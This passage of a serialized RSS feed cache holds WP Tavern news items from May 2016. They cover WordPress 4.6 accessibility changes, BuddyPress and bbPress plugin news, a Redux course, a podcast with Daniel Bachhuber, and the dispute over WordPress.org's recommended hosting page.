Pages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54910\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://wptavern.com/wordpress-4-6-improves-the-accessibility-of-the-tag-and-category-management-pages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2775:\"<p>Among the improvements coming in WordPress 4.6 are <a href=\"https://make.wordpress.org/core/2016/05/16/categories-and-tags-screens-changes/\">accessibility enhancements</a> to the Category and Tag management pages. The flow of each page has been changed so that the visual order of elements match the tab order. This allows those who navigate with keyboards to access the Add New Tag or Add New Category area first.</p>\n<p>Andrea Fercia, WordPress core committer and a member of the accessibility team, explains why the changes matter, “For accessibility, the visual order should always match the tab order. The main functionality in a page should just be the first thing in the source markup and other parts of the user interface should never be ‘skipped’.”</p>\n<p>The following image shows the tab order of elements on the Tag management screen in WordPress 4.5. In order to reach the Add New Tag section, you need to tab through a number of checkboxes, each tag in the tag cloud, and various quick edit links. This is a time-consuming and frustrating process.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/WordPress45TagManagementPage.png\"><img class=\"size-full wp-image-54944\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/WordPress45TagManagementPage.png?resize=1025%2C806\" alt=\"WordPress 4.5 Tag Management Element Order\" /></a>WordPress 4.5 Tag Management Element Order\n<p>In WordPress 4.6, the Add New Tag section is the first visual element as well as the first section accessed when pressing the tab key.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WordPress46TagManagementScreen.png\"><img class=\"size-full wp-image-54945\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WordPress46TagManagementScreen.png?resize=1025%2C792\" alt=\"WordPress 4.6 Tag Management Screen\" /></a>WordPress 4.6 Tag Management Screen\n<p>The new flow is more logical and provides consistency between the tag and category management screens, “From an accessibility point of view, the content structure and organization will be easier to understand and navigate,” Fercia said.</p>\n<p>WordPress theme and plugin authors who have added custom functionality to these screens are advised to double-check their code against the bleeding edge version of WordPress 4.6. There’s also an <a href=\"https://core.trac.wordpress.org/ticket/35664\">in-depth ticket</a> where developers and users can see how the team reached a consensus to implement the changes. If you have any questions or concerns please leave a comment on the <a href=\"https://make.wordpress.org/core/2016/05/16/categories-and-tags-screens-changes/\">announcement post</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 May 2016 19:30:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"WPTavern: New Plugin Uses BuddyPress Email API to Send bbPress Forum Emails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54863\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://wptavern.com/new-plugin-uses-buddypress-email-api-to-send-bbpress-forum-emails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3011:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/09/buddypress-bbpress.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/09/buddypress-bbpress.jpg?resize=1025%2C493\" alt=\"buddypress-bbpress\" class=\"aligncenter size-full wp-image-30982\" /></a></p>\n<p><a href=\"http://wptavern.com/buddypress-2-5-0-released-features-customizable-emails-and-support-for-emoji\" target=\"_blank\">BuddyPress 2.5</a>, released in March, introduced customizable emails via a new <a href=\"http://wptavern.com/buddypress-2-5-will-add-customizable-emails-via-a-new-bp-email-api\" target=\"_blank\">BP Email API</a>. This new feature allows community managers to easily edit BuddyPress-generated emails in the admin and make design changes in the customizer.</p>\n<p>It didn’t take long for developers to think of bringing this same customizability to bbPress emails. <a href=\"https://profiles.wordpress.org/thebrandonallen/\" target=\"_blank\">Brandon Allen</a> has just released <a href=\"https://wordpress.org/plugins/bp-emails-for-bbp/\" target=\"_blank\">BP Emails for BBP</a>, a plugin that sends forum and topic subscription emails using the new BP Email API.</p>\n<p>Once installed, administrators will find templates for new forum topics and topic replies under the same Emails menu item with the 16 customizable BuddyPress core emails.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/buddypress-bbpress-emails.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/buddypress-bbpress-emails.png?resize=1025%2C305\" alt=\"buddypress-bbpress-emails\" class=\"aligncenter size-full wp-image-54878\" /></a></p>\n<p>Allen noted that the plugin sends emails differently than bbPress, which puts every subscriber email in the BCC field and sends one email. Instead, it sends a separate email to each subscriber, which Allen said may improve deliverability given that some email providers look unfavorably on emails with large BCC fields.</p>\n<p>I tested the plugin and found that it works as advertised for customizing and sending bbPress emails. There are no settings to configure. It simply adds the same functionality that users now expect from BuddyPress core emails with all the same customization options.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/bbpress-subscription-email.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/bbpress-subscription-email.png?resize=1025%2C500\" alt=\"bbpress-subscription-email\" class=\"aligncenter size-full wp-image-54929\" /></a></p>\n<p><a href=\"https://wordpress.org/plugins/bp-emails-for-bbp/\" target=\"_blank\">BP Emails for BBP</a> is available on WordPress.org. It does not work with bbPress alone but requires both bbPress 2.5+ and BuddyPress 2.5+ to be active. With the help of this plugin, a community manager can brand all the email communications generated by the site so that the design and wording is consistent across both plugins.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 May 2016 05:32:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: BuddyPress 2.6 to Introduce New API for Navigation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54803\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/buddypress-2-6-to-introduce-new-api-for-navigation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2401:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/09/buddypress-logo-blue.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/09/buddypress-logo-blue.png?resize=839%2C398\" alt=\"buddypress-logo-blue\" class=\"aligncenter size-full wp-image-30655\" /></a></p>\n<p>In an exceptionally well-documented <a href=\"https://buddypress.trac.wordpress.org/changeset/10745/\" target=\"_blank\">commit message</a>, BuddyPress lead developer Boone Gorges introduced a new API to manage single item navigation, thanks to contributions from core developers Mathieu Viet and Raymond Hoh. Gorges summarized the changes to how BuddyPress will handle navigation in the upcoming 2.6 release:</p>\n<blockquote><p>The new BP_Core_Nav overhauls the way that BuddyPress registers, stores, and renders navigation items. Navigations are now component-specific, eliminating the potential for confusion and conflict between navigation items with similar names in different components, and opening the possibility of generating navs for separate objects of the same type on a single pageload.</p></blockquote>\n<p>The previous navigation system used bp_nav and bp_options_nav, global properties that managed nav and subnav across all of BuddyPress’ components. Developers had a difficult time extending navigation and sometimes ended up stepping on each other’s toes when adding similar navigation items.</p>\n<p>“The new system eliminates most of these problems, by removing direct access to the underlying navigation data, while providing a full-fledged API for accessing and modifying that data,” Gorges said.</p>\n<p>Although the new API ensures backward compatibility with the legacy bp_nav and bp_options_nav, plugin developers whose extensions depend on these methods will want to update their code. With the exception of certain configurations running PHP 5.2.x, most plugins should work the same as before.</p>\n<p>However, Gorges’ <a href=\"https://buddypress.trac.wordpress.org/changeset/10745/\" target=\"_blank\">commit message</a> details a handful of small ways that the new API may break backward compatibility in a few rare instances. BuddyPress plugin developers will want to review these ahead of the upcoming 2.6 release. Beta 1 is just one week away from release on May 25 and the official release is targeted for June 15.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 May 2016 05:06:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: Wes Bos Launches Free React.js + Redux Online Course\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54903\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/wes-bos-launches-free-react-js-redux-online-course\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3193:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/react-redux-course.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/react-redux-course.png?resize=1025%2C465\" alt=\"react-redux-course\" class=\"aligncenter size-full wp-image-54916\" /></a></p>\n<p><a href=\"http://wesbos.com/\" target=\"_blank\">Wes Bos</a>, a developer and educator known for his high quality video tutorials, has just launched a free online course for building JavaScript apps with <a href=\"https://facebook.github.io/react/\" target=\"_blank\">React.js</a> and <a href=\"http://redux.js.org/\" target=\"_blank\">Redux</a>. The 2.5 hour <a href=\"https://learnredux.com/\" target=\"_blank\">Learn Redux</a> course includes 20 videos that guide developers through building an example ‘Reduxstagram’ app to present the core ideas behind Redux.</p>\n<p>To get the most out of Learn Redux, students should have a decent foundation of React and ES6. Bos recommends those who are not comfortable with React to start with his <a href=\"https://reactforbeginners.com/\" target=\"_blank\">React for Beginners</a> course.</p>\n<p>After you sign up, you’ll receive an email with a link to the starter files and access to the videos. The example app uses Webpack to bundle ES6 modules into a single JavaScript file, so the course begins with a video on using NPM and Webpack to set up a local development environment. Learn Redux includes:</p>\n<ul>\n<li>Access to all 20 videos</li>\n<li>All starter files</li>\n<li>Webpack Build Templates</li>\n<li>Stepped and finished solutions</li>\n</ul>\n<p>Bos spent more than 100 hours producing this series in partnership with <a href=\"https://getsentry.com/welcome/\" target=\"_blank\">Sentry</a> as a sponsor. Anyone who signs up receives a $50 Sentry credit.</p>\n<p>After Calypso was announced, Bos, who describes himself as “a huge WordPress fan,” wrote a <a href=\"http://wesbos.com/wordpress-calypso-react/\" target=\"_blank\">post</a> dispelling rumors that WordPress was ditching PHP and being rewritten in Node.js. He also urged WordPress developers to learn JavaScript.</p>\n<p>“This is thunder in the distance as to what is to come in WordPress,” Bos said. “Much of the theme writing I do is already in JavaScript – I often use WordPress as just an API to get data out of, and then use frameworks like Angular, React, Google Maps or jQuery to display that data. I’m not building an entire website in a JavaScript framework, but much of the interactive view layer of these sites is moving into JavaScript frameworks.”</p>\n<p>If you want to be ready to dive into the next generation of WordPress site and application development with knowledge of one of the most popular JS frameworks, the free <a href=\"https://learnredux.com/\" target=\"_blank\">Learn Redux</a> course offers all the tools necessary for getting started with React.js, Redux, and React Router.</p>\n<p>“Our trusty PHP template files aren’t going anywhere anytime soon, but I’ll bet you dollars to donuts you’ll be writing a lot more JavaScript in your WordPress sites in the years to come,” Bos said.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 May 2016 21:50:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"WPTavern: Daniel Bachhuber Discusses WP-CLI, the WP REST API, and the Challenges of Contributing to Open Source on Roots Radio Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:142:\"http://wptavern.com/daniel-bachhuber-discusses-wp-cli-the-wp-rest-api-and-the-challenges-of-contributing-to-open-source-on-roots-radio-podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7828:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/daniel-bachhuber.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/daniel-bachhuber.jpg?resize=300%2C300\" alt=\"daniel-bachhuber\" class=\"alignright size-medium wp-image-54898\" /></a><a href=\"https://danielbachhuber.com/\" target=\"_blank\">Daniel Bachhuber</a>, maintainer of the <a href=\"http://wp-cli.org/\" target=\"_blank\">WP-CLI</a> project and a contributing developer to the <a href=\"http://v2.wp-api.org/\" target=\"_blank\">WP REST API</a>, joined Chris Carr and Austin Pray on a recent episode of the <a href=\"https://roots.io/podcast/ep13/\" target=\"_blank\">Roots Radio podcast</a>. Bachhuber discussed his recent experience crowdfunding his work on “<a href=\"https://wp-cli.org/restful/\" target=\"_blank\">A More RESTful WP-CLI</a>” as well as the challenges he’s encountered as a contributor to various open source projects over the years.</p>\n<p>In the first part of the episode, Bachhuber shared how he spent the 283 hours of time that the WordPress community funded to advance the WP-CLI and WP REST API projects. The funding gave him the opportunity to dedicate time split between the two projects. Bachhuber put in approximately 95 hours towards the REST API in January and February but the bulk of the hours went towards making WP-CLI more friendly for developers who work with the REST API.</p>\n<p>“WordPress developers are going to be putting a lot of time now towards writing REST endpoints that expose their functionality to the world, and it would be really nice if WP-CLI interoperated nicely with that and allowed you to use that functionality at the command line without having to separately write your own WP-CLI commands,” Bachhuber said.</p>\n<p>He discussed the challenge of scoping out this broad goal and what he learned about crowdfunding during the process.</p>\n<p>“The RESTful WP-CLI kickstarter project was intentionally ambitious, because I’m a guy who has big ideas and likes to do big things,” Bachhuber said. “There are some things I feel really happy that I’ve been able to ship and produce so far, and there are other features that, for one reason or another, I haven’t quite been able to execute yet and that’s a bit frustrating.</p>\n<p>“It’s a whole different ball game trying to manage the expectations of your Kickstarter backers than it is a single client. I’ve got 107 clients that I have to make happy,” he said.</p>\n<p>Nevertheless, Bachhuber said he was able to get the issue backlog for WP-CLI down to less than 60 issues and the dedicated time has allowed him to resolve old issues that have “languished since the dawn of time.”</p>\n<p>As part of the rewards offered for contributors to the crowdfunding campaign, Bachhuber offered his time consulting with individuals and organizations, which he found to be easier than traditional physical swag rewards.</p>\n<p>“I’m really glad that I chose [consulting] over having to give out physical swag, because it’s very difficult to procure and ship to everyone, particularly when you have international backers,” he said. “Even though I’ve spent a lot of my time fulfilling the rewards and talking with people and having calls with them and meeting up with them in person, it’s a much easier effort to manage than sending 100 coffee mugs across the world.”</p>\n<p>When asked if he’d do it again, Bachhuber said yes but emphasized that spending this much time on an open source project only works if you keep a healthy balance with other aspects of life.</p>\n<p>“I think it’s really important that if you’re contributing to open source projects on a regular basis or even maintaining them, that you balance your time between that and other things,” he said. “It’s really easy to get burned out on said open source project if you spend 100% of your time on it for a whole month or six months.</p>\n<p>“I was pretty intentional to say that the money I was raising was going to cover my involvement with the project for six months, a certain number of hours, and that it was going to be a part-time thing. That was a really healthy way to approach it. I think I would have gotten burned out if I had just tried to dive into it, crank it out, and move on to the next thing,” Bachhuber said.</p>\n<h3>The Emotional Challenges of Working on Open Source Projects</h3>\n<p>During the course of the interview Bachhuber was asked to share his feelings on what he referred to as “the kerfuffle with the REST API” that happened in February. The REST API team had written a merge proposal in September 2015 that recommended merging the API in two parts – the infrastructure in 4.4 and the posts, comments, terms, and users endpoints in 4.5 or 4.6. After partially executing on that proposal, the team held a status chat to discuss the plan moving forward.</p>\n<p>Bachhuber said that the discussion became “a very emotionally fraught event” after Matt Mullenweg said the project needed feature parity with the WordPress admin before any of the endpoints could be considered for merge. After putting hundreds of hours into the project alongside a handful of dedicated contributors who were already spread thin, he found this new requirement was a difficult pill to swallow.</p>\n<p>“For better or for worse, as a maintainer or even a participant of an open source project, you have to have a thick skin and realize that all the time the decisions that are made are not about you – they are about the project,” Bachhuber said. “Even if you are personally offended by the decision, it doesn’t matter because it isn’t about you. It’s really difficult to deal with emotionally.”</p>\n<p>Bachhuber’s years of contributing to and maintaing open source projects has taught him a few things about managing stress and conflict that <a href=\"https://2016.europe.wordcamp.org/session/my-condolences-youre-now-the-maintainer-of-a-popular-open-source-project/\" target=\"_blank\">he plans to share at WordCamp Europe</a> in a talk titled, “My condolences, You’re now the maintainer of a popular OS project.”</p>\n<p>“I find a lot of joy in maintaining open source projects,” Bachhuber said. “I also have to actively work to address the emotional side of the equation to make sure I’m in a healthy space to continue maintaining the project and the project is not affecting me personally. It’s taken me years to come to a point where I’m comfortable with that.”</p>\n<p>In the case of the WP REST API, Bachhuber has come to a place where he can compartmentalize his emotional reactions and responses to the differing opinions.</p>\n<p>“I’ve come to a point now where I care but I don’t care,” he said. “I care in the sense that I’d still love to see those endpoints go into core and see the fruits of our labors realized. I don’t care because I’m not emotionally attached to that happening on any particular time frame. I honestly would rather it happen when it’s ready to happen over prematurely, and I realize I might not be the best qualified person to make that decision.”</p>\n<p>In the remainder of the episode, Bachhuber and Carr discuss React, Redux, Karma, Enzyme, and other tools for testing and developing with the REST API. Check out the recording of the episode on <a href=\"https://roots.io/podcast/ep13/\" target=\"_blank\">Roots Radio</a> for more details about Bachhuber’s work on WP-CLI and his crowdfunding experience.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 May 2016 06:03:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"WPTavern: The WordPress.org Recommended Hosting Page is Revamped, Features Flywheel for the First Time\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54822\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"http://wptavern.com/the-wordpress-org-recommended-hosting-page-is-revamped-features-flywheel-for-the-first-time\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8235:\"<p>DreamHost, Flywheel, and SiteGround have joined Bluehost on WordPress.org’s new <a href=\"https://wordpress.org/hosting/\">recommended hosting</a> page. In mid 2015, Matt Mullenweg, co-founder of the open source WordPress project, <a href=\"http://wptavern.com/the-recommended-hosting-page-on-wordpress-org-starts-over-from-scratch\">announced</a> the page would be revamped. To have a chance at being listed webhosting companies needed to fill out a 40-question survey.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/RecommendedHostsPage.png\"><img class=\"size-full wp-image-54844\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/RecommendedHostsPage.png?resize=790%2C642\" alt=\"2016 Recommended Hosts Page\" /></a>2016 Recommended Hosts Page\n<p>This is Flywheel’s first time on the page. <a href=\"https://getflywheel.com/\">Flywheel</a>, launched in 2013, is a managed WordPress hosting company with an emphasis towards designers and agencies. I asked Dusty Davidson, c<span class=\"team__role\">o-Founder and CEO of Flywheel</span>, what it means to be included on the page. “We’re obviously excited to be included, and think it really reflects on the work we’ve done to create a great experience for WordPress users,” he<span class=\"team__role\"> said. </span></p>\n<p>The recommended webhosting page on WordPress.org is incredibly lucrative. Based on conversations I’ve had with employees of hosts listed, it can generate millions of dollars in revenue. I asked Davidson what impact this will have on his company, “<span class=\"team__role\">I’m sure it will undoubtedly send a good deal of traffic, but honestly we’re just humbled and excited to be recognized,” he said. </span></p>\n<h2>A New Round of Controversy</h2>\n<p>Over the years, companies have come and gone from the recommended hosting page. However, Bluehost in particular has consistently appeared on the list, including the most recent iteration. Bluehost is owned by <a href=\"http://www.endurance.com/\">Endurance International Group</a> who <a href=\"http://www.prweb.com/releases/2014/05/prweb11874425.htm\">invested in Automattic</a> in 2014. Because Mullenweg is the CEO of Automattic and controls who is listed on the page, it’s easy to see why it regularly generates controversy.</p>\n<p>Kevin Ohashi of ReviewSignal.com, <a href=\"http://reviewsignal.com/blog/2016/05/12/wordpress-org-updates-hosting-recommendations-nobody-knows-selection-criteria/\">criticized the lack of transparency</a> regarding the process for how hosts.</p>\n<blockquote><p>Who is responsible for this revamp? What were the selection criteria? How often will it be updated? Will existing companies be continuously re-evaluated?</p></blockquote>\n<p>These are important questions to ask and there are no publicly documented answers. In a follow up post, <a href=\"http://reviewsignal.com/blog/2016/05/13/wordpress-org-hosting-recommendations-listing-criteria/\">Ohashi investigated</a> what criteria needs to be met for being listed on the page. The post contains a number of screenshots of his private conversation with <a href=\"https://profiles.wordpress.org/macmanx\">James Huff</a>, who has volunteered for the WordPress project for 12 years and has worked at Automattic for five years.</p>\n<p>Huff was directly related to the project and influenced who was chosen thanks to his involvement on the WordPress Support Team. Within the conversation, he shares details of the process and mentions that no money exchanged hands. Early in the conversation, Ohashi tells Huff that he wants to learn and publish how the process works. However, Huff had no idea that everything he said would be made public.</p>\n<p>“I was invited to what sounded like a friendly chat over direct message from a concerned community member, after he was referred to me by a friend,” Huff said. “At no point was it clarified or even implied that anything discussed would be made public.”</p>\n<p><del>Conversations held in a private matter should remain private unless given permission to publish them, something I discovered the hard way.</del> Unfortunately, the post comes across as a public interrogation of Huff. I asked Huff, who was shaken by the experience, how it has affected him moving forward as it relates to the WordPress project.</p>\n<p>“I’d be lying if I said my feelings weren’t at least shaken by the experience, especially considering how polite he was to my friend and how hostile he was towards me apparently just because I work for Automattic, but this isn’t the first time that has happened to me and I don’t expect it to be the last,” he said.</p>\n<p>“There’s an usually prevalent negative bias against Automatticians who contribute to WordPress.”</p>\n<h2>Mullenweg Provides Clarification</h2>\n<p>Mullenweg <a href=\"http://reviewsignal.com/blog/2016/05/13/wordpress-org-hosting-recommendations-listing-criteria/#comment-1011\">commented on the post</a> where he not only sticks up for Huff, but answers some of the controversial questions raised by Ohashi. Mullenweg explains how the applicants were chosen, how the criteria is weighted, who makes the final decisions, and how much money is involved. Here is his comment in full.</p>\n<blockquote><p>‘I would like to see some transparency in the process’</p>\n<p>As stated on the page, the listing is completely arbitrary. The process was: There was a survey, four applicants were chosen, and the page was updated. That might repeat later in the year, or the process might change.</p>\n<p>‘how criteria are weighted’</p>\n<p>There is no criteria or weighting. It ultimately is one person’s opinion. Information that is important is reflected in the questions asked in the survey, but that is not everything that is taken into account. (I have looked at this site in the past, for example.)</p>\n<p>‘who is making the decisions’</p>\n<p>I am. James helped in sorting through the many submissions that came in, doing additional research, and digging on finalists, but ultimately the decision was mine. You can and should blame me fully for any issues you have with it. I appreciate James’ help in this go-round, but he will not be involved at all with any future updates. (So, please leave him alone.)</p>\n<p>‘how much money is involved’</p>\n<p>There was no money involved. Obviously being listed on the page is hugely valuable and impacts the listed (or 